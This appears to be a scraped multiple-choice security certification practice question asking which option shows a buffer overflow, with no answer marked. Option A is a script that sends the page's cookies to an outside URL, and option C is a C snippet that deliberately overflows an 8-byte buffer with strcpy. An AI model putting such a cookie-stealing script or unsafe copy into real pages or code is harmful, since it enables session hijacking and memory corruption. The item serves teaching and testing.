Which of the following displays an example of a buffer overflow attack?

Which of the following displays an example of a buffer overflow attack?

Which of the following displays an example of a buffer overflow attack?

A.
<SCRIPT>
document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie
</SCRIPT>

B.
Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C.
#include
char *code = “AAAABBBBCCCCDDD”; //including the character ” size = 16 bytes
void main()
{char buf[8];
strcpy(buf, code);
}

D.
<form action=”/cgi-bin/login” method=post>
Username: <input type=text name=username>
PassworD.<input type=password name=password>
<input type=submit value=Login>



Leave a Reply 0

Your email address will not be published. Required fields are marked *